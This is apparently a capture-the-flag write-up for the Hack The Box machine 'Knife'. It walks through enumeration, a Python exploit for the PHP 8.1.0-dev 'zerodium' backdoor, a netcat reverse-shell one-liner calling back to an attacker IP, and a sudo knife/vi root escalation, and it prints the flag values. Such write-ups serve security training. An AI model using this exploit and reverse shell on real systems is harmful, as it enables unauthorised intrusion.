Knife

Name: Knife
Release Date: 22 May 2021
Retire Date: 28 Aug 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
jkr 00 days, 00 hours, 13 mins, 43 seconds
jkr 00 days, 00 hours, 19 mins, 31 seconds
Creator: MrKN16H7
Pentest Workstation PDF: Knife.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.242

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have SSH (TCP 22) and HTTP (TCP 80) that are the major ports that we need to look at right now.  Gobuster found several pages and directories that could be interesting.

 

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.242

  
┌──(kali㉿kali)-[~/Desktop/HTB/Knife]
└─$ gobuster dir -u http://10.10.10.242 -w /usr/share/seclists/Discovery/Web-Content/common.txt -o gobusterKnife.out 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.242
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 13:58:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277] 
                                                
===============================================================
2022/01/17 14:00:03 Finished
===============================================================

Let's navigate to index.php and look at the network responses and source code.

Jackpot! The site is using PHP 8.1.0-DEV.  Running a simple searchsploit php 8.1.0-dev yields an RCE exploit, in particular, /usr/share/exploitdb/exploits/php/webapps/49933.py

From here, we can cat the user flag, but cannot navigate anywhere.

 

$ cat /home/james/user.txt
3bef3aa89f14c500983d38bc0514434d

 

We need to figure out a way to upgrade that terrible shell, but first let's check sudo -l

OK. Maybe we don't need to upgrade the shell... Let's check what Knife really is (besides a Ruby script). We can see what it does by looking at its manual page (man page) located here. OK. So, Knife will allow us to run other commands if we use the "data bag create 1 2 -e" parameters.  Seems easy.  Let's try it with Vim because we can use :!/bin/bash to escape Vim into an elevated shell!

 

sudo /usr/bin/knife data bag create 1 2 -e vi

 

:!/bin/bash

 

Well that didn't work. The terrible shell strikes again.  Let's nc back to our Attacking box and see if we get a better shell.  Let's try customizing our exploit.

 

#!/usr/bin/env python3

import requests

from sys import argv, exit

 

if len(argv) < 3:

    print("[!] Supply the URL and command to run")

    exit(1)

 

header = {"USER-AGENTT" : "zerodiumsystem(\""+argv[2]+"\");"}

url = argv[1]

 

r = requests.get(url, headers=header)

print(r.text.split("<!DOCTYPE html>")[0])

 

With this setup, we would need to provide the arguments for URL and command.

 

python3 exploit.py http://10.10.10.242 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1337 >/tmp/f"

 

MUCH better!  Now we have a TTY shell. Let's try that again.  SUCCESS!

 

root@knife:/# cat /root/root.txt
cat /root/root.txt                                                                                                         e4ad28aed3fd6c46bec92b6be7e4df45 

Escaping VIM is fun! Gotta love those GTFOBins! Claim VICTORY! This box is slashed!

 

.........

 

I'll see myself out XD